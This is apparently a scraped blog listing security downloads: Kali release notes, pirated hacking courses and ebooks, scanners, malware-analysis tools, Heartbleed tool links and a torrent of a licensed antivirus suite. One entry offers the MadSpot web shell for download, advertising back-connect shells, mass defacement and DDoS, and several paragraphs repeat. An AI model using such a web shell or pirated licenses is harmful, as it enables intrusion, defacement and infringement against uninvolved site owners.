The long awaited Kali Linux USB EFI boot support feature has been added to our binary ISO builds, which has prompted this early Kali Linux 1.0.8 release. This new feature simplifies getting Kali installed and running on more recent hardware which requires EFI as well as various Apple Macbooks Air and Retina models. Besides the addition of EFI support, there is a whole array of tool updates and fixes that have accumulated over the past couple of months.
As this new release focuses almost entirely on the EFI capable ISO image, Offensive Security won’t be releasing additional ARM or VMWare images with 1.0.8. As usual, you don’t need to re-download Kali if you’ve got it installed, and apt-get update && apt-get dist-upgrade should do the job.
[Udemy] Metasploit Extreme on Kali Linux
Udemy - Metasploit Extreme on Kali Linux
English | .MP4 | Audio: aac, 44100 Hz, stereo | Video: h264, yuv420p, 642x360, 30.00 fps(r) | 499 MB
English | .MP4 | Audio: aac, 44100 Hz, stereo | Video: h264, yuv420p, 642x360, 30.00 fps(r) | 499 MB
The re-engineered Metasploit Framework on Kali linux for Hackers and Penetration testers
Metaspoit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems. Its a powerful tool used for penetration testing.
In clear and short words, If you interested in words like security, Hacking, exploits etc, then this is a must series for you.
Download:
Part 1
Part 2
Part 3
Part 4
[ Udemy] Pentesting with BackTrack Course
CISP is a trademark certification and is globally recognized.
“Includes the training on Backtrack Operating System”
Course Instructor : Hitesh Choudhary
This course is ideal for penetration testers, security enthusiasts and network administrators. The course leading to the certification exam is entirely practical and hands-on in nature. The final certification exam is fully practical as well and tests the student’s ability to think out of the box and is based on the application of knowledge in practical real life scenarios.
On an average, NASSCOM predicts requirement of 10lakhs professionals by the year 2010. Currently the number of security professionals in India is around 22,000 and the applicants for the same are less than 1000.
The goal of this course is to help you master an ethical hacking methodology as a professional, starting from the scratch that can be used in a penetration testing or ethical hacking situation. You walk out the door with hacking skills that are highly in demand, as well as the internationally recognized Certified Information Security Professional certification!
“The bottom line with this program is that we hope the work starts when the class is over. Practical knowledge is always tested n same is provided here ”
[+Download+]
part 1
part 2
part 3
part 4
part 5
part 6
part 7
part 8
part 9
part 10
part 11
part 12
“Includes the training on Backtrack Operating System”
Course Instructor : Hitesh Choudhary
This course is ideal for penetration testers, security enthusiasts and network administrators. The course leading to the certification exam is entirely practical and hands-on in nature. The final certification exam is fully practical as well and tests the student’s ability to think out of the box and is based on the application of knowledge in practical real life scenarios.
On an average, NASSCOM predicts requirement of 10lakhs professionals by the year 2010. Currently the number of security professionals in India is around 22,000 and the applicants for the same are less than 1000.
The goal of this course is to help you master an ethical hacking methodology as a professional, starting from the scratch that can be used in a penetration testing or ethical hacking situation. You walk out the door with hacking skills that are highly in demand, as well as the internationally recognized Certified Information Security Professional certification!
“The bottom line with this program is that we hope the work starts when the class is over. Practical knowledge is always tested n same is provided here ”
[+Download+]
part 1
part 2
part 3
part 4
part 5
part 6
part 7
part 8
part 9
part 10
part 11
part 12
Udemy SQL Injection Master Course
SQL Injection is one of oldest and powerful threat to Web application, yet there is no great explanation to solve the problem and a hands on guide to master SQL Injection. In this course you will learn to design your own challenges along with the guidance to hack into those custom created sites for pentesting purposes.
If you are a Pentester or Hacker or Developer or Information Security enthusiastic, you will love this course for sure. So, No theories Just practical Videos to learn. Jump in into the course to get more.
Download: Solidfiles Mediafire Torrent
If you are a Pentester or Hacker or Developer or Information Security enthusiastic, you will love this course for sure. So, No theories Just practical Videos to learn. Jump in into the course to get more.
Download: Solidfiles Mediafire Torrent
OWASP OWTF Offensive (Web) Testing Framework
The purpose of this tool is to automate the manual, uncreative part
of pen testing: For example, spending time trying to remember how to
call "tool X", parsing results of "tool X" manually to feed "tool Y",
etc.
By reducing this burden I hope pen testers will have more time to:
- See the big picture and think out of the box
- More efficiently find, verify and combine vulnerabilities
- Have time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessions
- Perform more tactical/targeted fuzzing on seemingly risky areas
- Demonstrate true impact despite the short timeframes we are typically given to test.
Some features like the passive and semi_passive test separation
may also assist pen testers wishing to go the extra mile to get a head
start and maybe even legitimately start report writing or preparing
attacks before they are given the green light to test.
The tool is highly configurable and anybody can trivially create
simple plugins or add new tests in the configuration files without
having any development experience. Please share your tests with the
community! :)
This tool is however not a silverbullet and will only be as good as
the person using it: Understanding and experience will be required to
correctly interpret tool output and decide what to investigate further
in order to demonstrate impact.
Features
- OWASP Testing Guide-oriented: owtf will try to classify the findings as closely as possible to the OWASP Testing Guide
- Report updated on the fly: As soon as each plugin finishes or sometimes before (i.e. after each vulnerability scanner finishes)
- "Scumbag spidering": Instead of implementing yet another spider (a hard job), owtf will scrub the output of all tools/plugins run to gather as many URLs as possible. This is somewhat "cheating" but tremendously effective since it combines the results of different tools, including several tools that perform brute forcing of files and directories.
- Resilience: If one tool crashes owtf will move on to the next tool/test, saving the partial output of the tool until it crashed
- Easy to configure: config files are easy to read and modify
- Easy to run: No strange parameters, DB setup requirements, libraries, complex dependencies, etc
- Full control of what tests to run, interactivity and hopefully easy to follow examples and help :)
- Easy to review transaction logs and plain text files with URLs, simple for scripting
- Basic Google Hacking without (annoying) API Key requirements via "blanket searches", trying a bunch of operators at once, you can then narrow the search down if you find something interesting.
- Easy to extract data from the database to parse or pass to other tools: They are all text files
Requirements
- Linux (any Ubuntu derivative should work just fine) and python 2.6.5 or greater
- Latest Kali version not required but helpful (almost 0 setup time)
- You do NOT have to have all tools installed: owtf will move on with an error for the missing tools
[Download]
Kali Linux 1.0.7 Released
Kali linux 1.0.7 has just been released,
complete with a whole bunch of tool updates, a new kernel, and some
cool new features. Check out our changelog
for a full list of these items. As usual, you don’t need to re-download
or re-install Kali to benefit from these updates – you can update to
the latest and greatest using these simple commands:
apt-get update
apt-get dist-upgrade
# If you've just updated your kernel, then:
reboot
apt-get dist-upgrade
# If you've just updated your kernel, then:
reboot
Kali Linux Encrypted USB Persistence
One
of the new sought out features introduced (which is also partially
responsible for the kernel update) is the ability to create Kali Linux Live USB with LUKS Encrypted Persistence.
This feature ushers in a new era of secure Kali Linux USB portability,
allowing us to either boot to a “clean” Kali image or alternatively,
overlay it with the contents of a persistent encrypted partition, all
within the same USB drive.
Tool Developers Ahoy!
This
release also marks the beginning of some co-ordinated efforts between
Kali developers and tool developers to make sure their tools are
represented correctly and are fully functional within Kali Linux. We
would like to thank the metasploit, w3af, and wpscan dev teams for
working with us to perfect their Kali packages and hope that more tool
developers join in. Tool developers are welcome to send us an email to and we’ll be happy to work with you to better integrate your tool into Kali.
Kali Linux: Greater Than the Sum of its Parts
For
quite some time now, we’ve been preaching that Kali Linux is more than a
“Linux distribution with a collection of tools in it”. We invest a
significant of time and resources developing and enabling features in
the distribution which we think are useful for penetration testers and
other security professionals. These features range from things like “live-build“, which allows our end users to easily customize their own Kali ISOs to features like Live USB persistence encryption,
which provides paranoid users with an extra layer of security. Many of
these features are unique to Kali and can be found nowhere else. We’ve
started tallying these features and linking them from our Kali documentation page – check it out, it’s growing to be an impressive list!
Coding for Pentesting Testers
Tools used for penetration testing are often purchased or downloaded from the Internet. Each tool is based on a programming language such as Perl, Python, or Ruby. If a penetration tester wants to extend, augment, or change the functionality of a tool to perform a test differently than the default configuration, the tester must know the basics of coding for the related programming language. Coding for Penetration Testers provides the reader with an understanding of the scripting languages that are commonly used when developing tools for penetration testing. It also guides the reader through specific examples of custom tool development and the situations where such tools might be used. While developing a better understanding of each language, the reader is guided through real-world scenarios and tool development that can be incorporated into a tester's toolkit.
CWSP Certified Wireless Security Professional Official Study Guide
Sybex is now the official publisher for Certified Wireless Network Professional, the certifying vendor for the CWSP program. This guide covers all exam objectives, including WLAN discovery techniques, intrusion and attack techniques, 802.11 protocol analysis. Wireless intrusion-prevention systems implementation, layer 2 and 3 VPNs used over 802.11 networks, and managed endpoint security systems. It also covers enterprise/SMB/SOHO/Public-Network Security design models and security solution implementation, building robust security networks, wireless LAN management systems, and much more.
[Download]
[Download]
Microsoft System Center 2012 Endpoint Protection Cookbook
Preface
Chapter 1: Getting Started with Client-Side Endpoint Protection Tasks
Chapter 2: Planning and Rolling Installation
Chapter 3: SCEP Configuration
Chapter 4: Client Deployment Preparation and Deployment
Chapter 5: Common Tasks
Chapter 6: Management Tasks
Chapter 7: Reporting
Chapter 8: Troubleshooting
Chapter 9: Building an SCCM 2012 Lab
Appendix
Index
[Download]
Firebug 1.5: Editing, Debugging, and Monitoring Web Pages
Table of Contents
Preface
Chapter 1: Getting Started with Firebug
Chapter 2: Firebug Window Overview
Chapter 3: Inspecting and Editing HTML
Chapter 4: CSS Development
Chapter 5: JavaScript Development
Chapter 6: Knowing Your DOM
Chapter 7: Performance Tuning Our Web Application
Chapter 8: AJAX Development
Chapter 9: Tips and Tricks for Firebug
Chapter 10: Necessary Firebug Extensions
Chapter 11: Extending Firebug
Appendix: A Quick Overview of Firebug's Features and Options
Index
[Download]
Preface
Chapter 1: Getting Started with Firebug
Chapter 2: Firebug Window Overview
Chapter 3: Inspecting and Editing HTML
Chapter 4: CSS Development
Chapter 5: JavaScript Development
Chapter 6: Knowing Your DOM
Chapter 7: Performance Tuning Our Web Application
Chapter 8: AJAX Development
Chapter 9: Tips and Tricks for Firebug
Chapter 10: Necessary Firebug Extensions
Chapter 11: Extending Firebug
Appendix: A Quick Overview of Firebug's Features and Options
Index
[Download]
vi and Vim Editors Pocket Reference, 2nd Edition
Many Unix, Linux, and Mac OS X geeks enjoy using the powerful, platform-agnostic text editors vi and Vim, but there are far too many commands for anyone to remember. Author Arnold Robbins has chosen the most valuable commands for vi, Vim, and vi's main clones-vile, elvis, and nvi-and packed them into this easy-to-browse pocket reference. You'll find commands for all kinds of editing tasks, including programming, modifying system files, writing and marking up articles, and more.
[Download]
[Download]
Security Power Tools
What if you could sit down with some of the most talented security engineers in the world and ask any network security question you wanted? Security Power Tools lets you do exactly that! Members of Juniper Networks' Security Engineering team and a few guest experts reveal how to use, tweak, and push the most popular network security applications, utilities, and tools available using Windows, Linux, Mac OS X, and Unix platforms.
Designed to be browsed, Security Power Tools offers you multiple approaches to network security via 23 cross-referenced chapters that review the best security tools on the planet for both black hat techniques and white hat defense tactics. It's a must-have reference for network administrators, engineers and consultants with tips, tricks, and how-to advice for an assortment of freeware and commercial tools, ranging from intermediate level command-line operations to advanced programming of self-hiding exploits.
[Download]
Designed to be browsed, Security Power Tools offers you multiple approaches to network security via 23 cross-referenced chapters that review the best security tools on the planet for both black hat techniques and white hat defense tactics. It's a must-have reference for network administrators, engineers and consultants with tips, tricks, and how-to advice for an assortment of freeware and commercial tools, ranging from intermediate level command-line operations to advanced programming of self-hiding exploits.
[Download]
Hello Android (3rd Edition)
[Amazon review]
Google's Android is shaking up the mobile market in a big way. With Android, you can write programs that run on any compatible cell phone or tablet in the world. It's a mobile platform you can't afford not to learn, and this book gets you started. Hello, Android has been updated to Android 2.3.3, with revised code throughout to reflect this updated version. That means that the book is now up-to-date for tablets such as the Kindle Fire. All examples were tested for forwards and backwards compatibility on a variety of devices and versions of Android from 1.5 to 4.0. (Note: the Kindle Fire does not support home screen widgets or wallpaper, so those samples couldn't be tested on the Fire.)
Android is an operating system for mobile phones and tablets. It's inside millions of cell phones and other devices, including the hugely popular Amazon Kindle Fire, making Android the foremost platform for mobile application developers. That could be your own program running on all those devices.
Within minutes, Hello, Android will get you started creating your first working application: Android's version of "Hello, World." From there, you'll build up a more substantial example: an Android Sudoku game. By gradually adding features to the game, you'll learn the basics of Android programming. You'll also see how to build in audio and video support, add graphics using 2D and 3D OpenGL, network with web pages and web services, and store data with SQLite. You'll also learn how to publish your applications to the Android Market.
The #1 book for learning Android is now in its third edition. Every page and example was reviewed and updated for compatibility with the latest versions. Freshly added material covers installing applications to the SD card, supporting multi-touch, and creating live wallpaper. You'll also find plenty of real-world advice on how to support all major Android versions in use today.
[Download]
Google's Android is shaking up the mobile market in a big way. With Android, you can write programs that run on any compatible cell phone or tablet in the world. It's a mobile platform you can't afford not to learn, and this book gets you started. Hello, Android has been updated to Android 2.3.3, with revised code throughout to reflect this updated version. That means that the book is now up-to-date for tablets such as the Kindle Fire. All examples were tested for forwards and backwards compatibility on a variety of devices and versions of Android from 1.5 to 4.0. (Note: the Kindle Fire does not support home screen widgets or wallpaper, so those samples couldn't be tested on the Fire.)
Android is an operating system for mobile phones and tablets. It's inside millions of cell phones and other devices, including the hugely popular Amazon Kindle Fire, making Android the foremost platform for mobile application developers. That could be your own program running on all those devices.
Within minutes, Hello, Android will get you started creating your first working application: Android's version of "Hello, World." From there, you'll build up a more substantial example: an Android Sudoku game. By gradually adding features to the game, you'll learn the basics of Android programming. You'll also see how to build in audio and video support, add graphics using 2D and 3D OpenGL, network with web pages and web services, and store data with SQLite. You'll also learn how to publish your applications to the Android Market.
The #1 book for learning Android is now in its third edition. Every page and example was reviewed and updated for compatibility with the latest versions. Freshly added material covers installing applications to the SD card, supporting multi-touch, and creating live wallpaper. You'll also find plenty of real-world advice on how to support all major Android versions in use today.
[Download]
Wireshark (R) 101 Essential Skills for Network Analysis
This book is written for beginner analysts and includes 46 step-by-step labs to walk you through many of the essential skills contained herein. This book provides an ideal starting point whether you are interested in analyzing traffic to learn how an application works, you need to troubleshoot slow network performance, or determine whether a machine is infected with malware.
[Download]
[Download]
Hacking Vim 7.2
Table of Contents
PrefaceChapter 1: Getting Started with Vim
Chapter 2: Personalizing Vim
Chapter 3: Better Navigation
Chapter 4: Production Boosters
Chapter 5: Advanced Formatting
Chapter 6: Basic Vim Scripting
Chapter 7: Extended Vim Scripting
Appendix A: Vim Can Do Everything
Appendix B: Vim Configuration Alternatives
Index
[Download]
Handbook of Digital Forensics and Investigation
The Handbook of Digital Forensics and Investigation builds on the success of the Handbook of Computer Crime Investigation, bringing together renowned experts in all areas of digital forensics and investigation to provide the consummate resource for practitioners in the field.
This unique collection details how to conduct digital investigations in both criminal and civil contexts, and how to locate and utilize digital evidence on computers, networks, and embedded systems. Specifically, the Investigative Methodology section of the Handbook provides expert guidance in the three main areas of practice: Forensic Analysis, Electronic Discovery and Intrusion Investigation. The Technology section is extended and updated to reflect the state of the art in each area of specialization. The main areas of focus in the Technology section are forensic analysis of Windows, Unix, Macintosh, and embedded systems (including cellular telephones and other mobile devices), and investigations involving networks (including enterprise environments and mobile telecommunications technology).
[Download]
Write Great Code Volume 1&2
If you've asked someone the secret to writing efficient, well-written software, the answer that you've probably gotten is "learn assembly language programming." By learning assembly language programming, you learn how the machine really operates and that knowledge will help you write better high-level language code. A dirty little secret assembly language programmers rarely admit to, however, is that what you really need to learn is machine organization, not assembly language programming. Write Great Code Vol I, the first in a series from assembly language expert Randall Hyde, dives right into machine organization without the extra overhead of learning assembly language programming at the same time. And since Write Great Code Vol I concentrates on the machine organization, not assembly language, the reader will learn in greater depth those subjects that are language-independent and of concern to a high level language programmer. Write Great Code Vol I will help programmers make wiser choices with respect to programming statements and data types when writing software, no matter which language they use.
[Volume 1] [Volume 2]
[Volume 1] [Volume 2]
Linux Networking Clearly Explained
Passionately democratic in its advocacy of networking for the masses,
this is the first book on Linux networking written especially for the
novice user. Because the free, open-source Linux operating system is
winning so many converts today, the number of Linux-based networks will
grow exponentially over the next few years. Taking up where Linux
Clearly Explained left off, Linux Networking Clearly Explained walks the
reader through the creation of a TCP/IP-based, Linux-driven local area
network, beginning with a "sandbox" installation involving just two or
three computers. Readers master the fundamentals of system and network
administration-including handling user accounts and setting up
security-in this less complex environment. The author then helps them
along to the more sophisticated techniques associated with connecting
this network to the Internet.
* Focuses on the 20% of Linux networking knowledge that satisfies 80% of network needs-including the needs of small businesses, workgroups within enterprises and high-tech homes.
* Teaches novices to implement DNS servers, network information services
[Download]
* Focuses on the 20% of Linux networking knowledge that satisfies 80% of network needs-including the needs of small businesses, workgroups within enterprises and high-tech homes.
* Teaches novices to implement DNS servers, network information services
[Download]
Getting Started with Raspberry Pi
What can you do with the Raspberry Pi, a $35 computer the size of a
credit card? All sorts of things! If you’re learning how to program, or
looking to build new electronic projects, this hands-on guide will show
you just how valuable this flexible little platform can be.
This book takes you step-by-step through many fun and educational possibilities. Take advantage of several preloaded programming languages. Use the Raspberry Pi with Arduino. Create Internet-connected projects. Play with multimedia. With Raspberry Pi, you can do all of this and more.
This book takes you step-by-step through many fun and educational possibilities. Take advantage of several preloaded programming languages. Use the Raspberry Pi with Arduino. Create Internet-connected projects. Play with multimedia. With Raspberry Pi, you can do all of this and more.
- Get acquainted with hardware features on the Pi’s board
- Learn enough Linux to move around the operating system
- Pick up the basics of Python and Scratch—and start programming
- Draw graphics, play sounds, and handle mouse events with the Pygame framework
- Use the Pi’s input and output pins to do some hardware hacking
- Discover how Arduino and the Raspberry Pi complement each other
- Integrate USB webcams and other peripherals into your projects
- Create your own Pi-based web server with Python.
Think Like a Programmer
The real challenge of programming isn't learning a language's
syntax—it's learning to creatively solve problems so you can build
something great. In this one-of-a-kind text, author V. Anton Spraul
breaks down the ways that programmers solve problems and teaches you
what other introductory books often ignore: how to Think Like a Programmer.
Each chapter tackles a single programming concept, like classes,
pointers, and recursion, and open-ended exercises throughout challenge
you to apply your knowledge. You'll also learn how to:
Although the book's examples are written in C++, the creative problem-solving concepts they illustrate go beyond any particular language; in fact, they often reach outside the realm of computer science. As the most skillful programmers know, writing great code is a creative art—and the first step in creating your masterpiece is learning to Think Like a Programmer.
[Download]
- Split problems into discrete components to make them easier to solve
- Make the most of code reuse with functions, classes, and libraries
- Pick the perfect data structure for a particular job
- Master more advanced programming tools like recursion and dynamic memory
- Organize your thoughts and develop strategies to tackle particular types of problems
Although the book's examples are written in C++, the creative problem-solving concepts they illustrate go beyond any particular language; in fact, they often reach outside the realm of computer science. As the most skillful programmers know, writing great code is a creative art—and the first step in creating your masterpiece is learning to Think Like a Programmer.
[Download]
WVS v9.5 - Acunetix Web Vulnerability Scanner
Acunetix Web Vulnerability Scanner (WVS) is an automated web
application security testing tool that audits your web applications by
checking for exploitable hacking vulnerabilities. Automated scans may be
supplemented and cross-checked with the variety of manual tools to
allow for comprehensive web site and web application penetration
testing.
This week the latest version was released, Acunetix Vulnerability Scanner 9.5.
Features
- AcuSensor Technology
- Industry’s most advanced and in-depth SQL injection and Cross site scripting testing
- Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
- Visual macro recorder makes testing web forms and password protected areas easy
- Support for pages with CAPTCHA, single sign-on and Two Factor authentication mechanisms
- Extensive reporting facilities including PCI compliance reports
- Multi-threaded and lightning fast scanner – processes thousands of pages with ease
- Intelligent crawler detects web server type, application language and smartphone-optimized sites.
- Acunetix crawls and analyzes different types of websites including HTML5, SOAP and AJAX
- Port scans a web server and runs security checks against network services running on the server
CMS Security Handbook: The Comprehensive Guide for WordPress, Joomla, Drupal, and Plone
Protect your business. Protect your customers. Here's how: websites
built on open source Content Management Systems (CMSs) are uniquely
vulnerable. If you are responsible for maintaining one, or if you are
the executive or business owner in charge of approving IT budgets, you
need to know what's in this book. Here's the lowdown on very real
security threats, how attacks are carried out, what security measures
you need to take, and how to compile a disaster recovery plan. Don't
wait. Your business may depend on the action you take.
2011 | 432 Pages | ISBN: 0470916214 | EPUB | 14 MB
From SQLi to Shell [PDF]
Collection of Heartbleed Tools (OpenSSL CVE-2014-0160)
- A checker (site and tool) for CVE-2014-0160: https://github.com/FiloSottile/Heartbleed
- ssltest.py: Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford http://pastebin.com/WmxzjkXJ
- SSL Server Test https://www.ssllabs.com/ssltest/index.html
- Metasploit Module: https://github.com/rapid7/metasploit-framework/pull/3206/files
- Nmap NSE script: Detects whether a server is vulnerable to the OpenSSL Heartbleed: https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
- Nmap NSE script: Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas https://gist.github.com/RealRancor/10140249
- Heartbleeder: Tests your servers for OpenSSL: https://github.com/titanous/heartbleeder?files=1
- Heartbleed Attack POC and Mass Scanner: https://bitbucket.org/fb1h2s/cve-2014-0160
- Heartbleed Honeypot Script: http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt
Credit: http://hack-tools.blackploit.com/2014/04/collection-of-heartbleed-tools-openssl.html
Heartbleed - OpenSSL Zero-day Bug
The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.
Read more at http://heartbleed.com/
MadSpot Security Team Shell V 1.0
Madspot Shell 1.0 Have Following Features:
Madspot shell works both on Windows and Linux OS.
- Process
- Eval
- SQL
- Hash
- Perl and PHP Back Connect
- Zone-h mass defacer
- Powerfull DDOS tool
- Auto Safe mood Off
- Whole Server Auto Symlink
- Perl 500 Internal Error Bypass
- Killcode
[Download]
Pass=http://madspot.net
Madspot shell works both on Windows and Linux OS.
- Process
- Eval
- SQL
- Hash
- Perl and PHP Back Connect
- Zone-h mass defacer
- Powerfull DDOS tool
- Auto Safe mood Off
- Whole Server Auto Symlink
- Perl 500 Internal Error Bypass
- Killcode
[Download]
Pass=http://madspot.net
Malware Analysis by Cuckoo Sandbox
What is Malwr?
Malwr is a free malware analysis service and community launched in January 2011. You can submit files to it and receive the results of a complete dynamic analysis back.Mission
Existing online analysis services are all based on closed and commercial technologies, often with intents to leverage people's data to own profit and with no real transparency on how the data is being used. We are researchers ourselves and felt the need of an alternative solution.Our mission is to provide a powerful, free, independent and non-commercial service to the security community, independent or academic researchers with no other goal than facilitating everyone's daily work and give a contribution to the community.
Independent
Malwr is operated by volunteer security professionals with the exclusive intent to help the community. It's not associated or influenced by any commercial or government organization of any sort.Non-Commercial
We do not profit on your data. The files you submit, the information you provide and any other use you make of the website is not commercialized in any way. We create and use open source technology. We're not advertising any commercial product, we are not collecting data to enrich any existing product.Privacy
Unless you specify otherwise, the files you submit are not shared outside. While we believe in the value of sharing within our community and the larger public, we do strongly believe in respecting your privacy and the confidentiality of the data you handle.We really invite you to read our Terms of Service for "detailed" "policies".
[Malware Analysis by Cuckoo Sandbox]
Web Application Vulnerabilities - Detect, Exploit, Prevent [PDF]
Web Application Vulnerabilities: Detect, Exploit, Prevent
�Web Application Vulnerabilities: Detect, Exploit, Prevent�
Syngress | 2007 | ISBN: 1597492094
9781597492096 9780080556642 | 476 pages | PDF | 17 MB
This book describes how to make a computer bend to your will by finding
and exploiting vulnerabilities specifically in Web applications. The
book describes common security issues in Web applications, tells you how
to find them, describes how to exploit them, and then tells you how to
fix them.
The book covers how and why some hackers (the bad guys) will try to
exploit these vulnerabilities to achieve their own end. Author explains
how to detect if hackers are actively trying to exploit vulnerabilities
in your own Web applications.
� Learn to defend Web-based applications developed with AJAX, SOAP,
XMLPRC, and more.
� See why Cross Site Scripting attacks can be so devastating.
Contents
Chapter 1 : Introduction to Web Application Hacking
Introduction
Web Application Architecture Components
Complex Web Application Software Components
Putting it all Together
The Web Application Hacking Methodology
The History of Web Application Hacking and the Evolution of Tools
Summary
Chapter 2 : Information Gathering Techniques
Introduction
The Principles of Automating Searches
Applications of Data Mining
Collecting Search Terms
Summary
Chapter 3 : Introduction to Server Side Input Validation Issues
Introduction
Cross Site Scripting (XSS)
Chapter 4 : Client-Side Exploit Frameworks
Introduction
AttackAPI
BeEF
CAL9000
Overview of XSS-Proxy
Summary
Solutions Fast Track
Frequently Asked Questions
Chapter 5 : Web-Based Malware
Introduction
Attacks on the Web
Hacking into Web Sites
Index Hijacking
DNS Poisoning (Pharming)
Malware and the Web: What, Where, and How to Scan
Parsing and Emulating HTML
Browser Vulnerabilities
Testing HTTP-scanning Solutions
Tangled Legal Web
Summary
Solutions Fast Track
Frequently Asked Questions
Chapter 6 : Web Server and Web Application Testing with BackTrack
Objectives
Introduction
Approach
Core Technologies
Open Source Tools
Case Studies: The Tools in Action
Chapter 7 : Securing Web Based Services
Introduction
Web Security
Instant Messaging
Web-based Vulnerabilities
Buffer Overflows
Making Browsers and E-mail Clients More Secure
Securing Web Browser Software
CGI
Break-ins Resulting from Weak CGI Scripts
FTP Security
Directory Services and LDAP Security
Summary
Solutions Fast Track
Frequently Asked Questions
Index
Web Application Vulnerabilities: Detect, Exploit, Prevent
[Download]
[Download]
Salted Hash Kracker v1.0 [Tool to recover the Password from Salted Hash text]
Salted Hash Kracker is the free all-in-one tool to recover the Password from Salted Hash text. These days most websites and applications use salt based hash
generation to prevent it from being cracked easily using precomputed
hash tables such as Rainbow Crack. In such cases, 'Salted Hash Kracker' will help you to recover the lost password from salted hash text.
It also allow you to specify the salt position
either in the beginning of password(salt+password) or at the end of the
password (password+salt). In case you want to perform normal hash
cracking without the salt then just leave the 'Salt field' blank.
Currently it supports password recovery from following popular Hash types
- MD5
- SHA1
- SHA256
- SHA384
- SHA512
It uses dictionary based cracking method which makes the cracking operation simple and easier. You can find good collection of password dictionaries (also called wordlist) here & here
It is fully portable and works on all Windows platforms starting from Windows XP to Windows 8.
[Download]
Agnitio [Manual Security Code Review Tool]
A tool to help developers and security professionals conduct manual
security code reviews in a consistent and repeatable way. Agnitio aims
to replace the adhoc nature of manual security code review
documentation, create an audit trail and reporting.
Features
- Security code reviews
- Security code review metrics and reporting
- Application security code review tool
- Static analysis security guidance and reporting
VirAtt Virus Scanner
Description
This program is a scanner that helps detect and delete virus such as "MyDoom, Sasser, etc", created with custom engine developed by VirAtt Viruslab this program fastly detect, delete, and destroy process file of the virus itself including fixing registry error caused by the virus.Features
- Destroy Worm Process (Mydoom, Sasser, etc.)
- Super small process and file
- Delete virus and worm file in system directory
- Fix Registry errors caused by the virus
- Unhide windows function (Task Manager, MSConfig, etc)
MISP v2.1 [ Malware Information Sharing Platform]
The problem that we experienced in the past was the difficulty to
exchange information about (targeted) malwares and attacks within a
group of trusted partners, or a bilateral agreement. Even today much of
the information exchange happens in unstructured reports where you have
to copy-paste the information in your own text-files that you then have
to parse to export to (N)IDS and systems like log-searches, etc…
A huge challenge in the Cyber Security domain is the information sharing
inside and between organizations. This platform has as goal to
facilitate:
- central IOC database: storing technical and non-technical information about malwares and attacks, … Data from external instances is also imported into your local instance
- correlation: automatically creating relations between malwares, events and attributes
- storing data in a structured format (allowing automated use of the database for various purposes)
- export: generating IDS, OpenIOC, plain text, xml output to integrate with other systems (network IDS, host IDS, custom tools, …)
- import: batch-import, import from OpenIOC, GFI sandbox, ThreatConnect CSV, …
- data-sharing: automatically exchange and synchronization with other parties and trust-groups
Exchanging info results in faster detection of targeted attacks
and improves the detection ratio while reducing the false positives. We
also avoid reversing similar malware as we know very fast that others
already worked on this malware.
Malware Classifier [Malware Analysis Tool ]
Adobe Malware Classifier is a command-line tool that lets antivirus
analysts, IT administrators, and security researchers quickly and easily
determine if a binary file contains malware, so they can develop
malware detection signatures faster, reducing the time in which users'
systems are vulnerable.
Malware Classifier uses machine learning algorithms to classify Win32
binaries – EXEs and DLLs – into three classes: 0 for “clean,” 1 for
“malicious,” or “UNKNOWN.”
The tool was developed using models resultant from running the J48, J48
Graft, PART, and Ridor machine-learning algorithms on a dataset of
approximately 100,000 malicious programs and 16,000 clean programs.
The tool extracts seven key features from an unknown binary, feeds them
to one of the four classifiers or all of them, and presents its
classification of the unknown binary.
[Download]
Avira Internet Security Suite 2014 v14.0.1.179+License [Torrent]
As the first company Avira Antivirus German, now able to market to a very good antivirus. Avira Internet Security antivirus offered by this company is one of the most powerful yet high-performance and show data, it can be considered one of the strongest available security package into account. The software of your computer against viruses, worms, Internet 's, Trojans, ad and spyware you, robots (Bots) and protects them from dangerous spyware. The important features of Avira Internet Security software uses very few system resources, settings and user interface is very simple scanner tool to prepare profiles, search for detection of malware, safety Mail POP3 and SMTP against viruses and malware powerful servers to download updates faster, at intervals specified by the user to update, complete security against phishing, rootkits and phishing attacks and security systems that are fully integrated.
A key feature of the software Avira Internet Security:
- Brabranva effective protection from viruses, Trojans, worms and other threats
- effectively detect and remove rootkits
- High scanning speed
- new interface design graphics software
- protect the system against attacks known as phishing
- protection against all types of malware and spyware
- Special protection against viruses for emails (POP 3)
- Quickly update feature through Server Premium
- emergency rescue system disc
- saver for web browsing and Download Safe
- Powerful embedded firewall software
- anti-spam and passive AntiPhishing
- performance to match data Abbey
- being friendly
- and ...
- Min. 150 MB available disk space
- Min. 512 MB ??RAM (Windows XP)
- Min. 1024th MB RAM (Windows Vista, Windows 7)
- For all installations: Windows Internet Explorer 6.0 or higher
- Administrator rights are required for the installation
1.Run setup file & install it.
2.Select offline activation & activate using key file
[Torrent Link]
[Malheur v0.5.4] Malware Analyzer
Malheur is a tool for the automatic analysis of malware behavior
(program behavior recorded from malicious software in a sandbox
environment). It has been designed to support the regular analysis of
malicious software and the development of detection and defense measures.
Malheur allows for identifying novel classes of malware with similar
behavior and assigning unknown malware to discovered classes.
Analysis of malware behavior?
Malheur builds on the concept of dynamic analysis:
Malware binaries are collected in the wild and executed in a sandbox,
where their behavior is monitored during run-time. The execution of
each malware binary results in a report of recorded behavior. Malheur
analyzes these reports for discovery and discrimination of malware
classes using machine learning.
Malheur can be applied to recorded behavior of various format, as
long as monitored events are separated by delimiter symbols, for
example as in reports generated by the popular malware sandboxes
CWSandbox,
Anubis,
Norman Sandbox and
Joebox.
[Download]
Malcom [Malware Communication Analyzer]
Malcom is a tool designed to analyze a system's network communication
using graphical representations of network traffic. This comes handy
when analyzing how certain malware species try to communicate with the
outside world.
Malcom can help you:
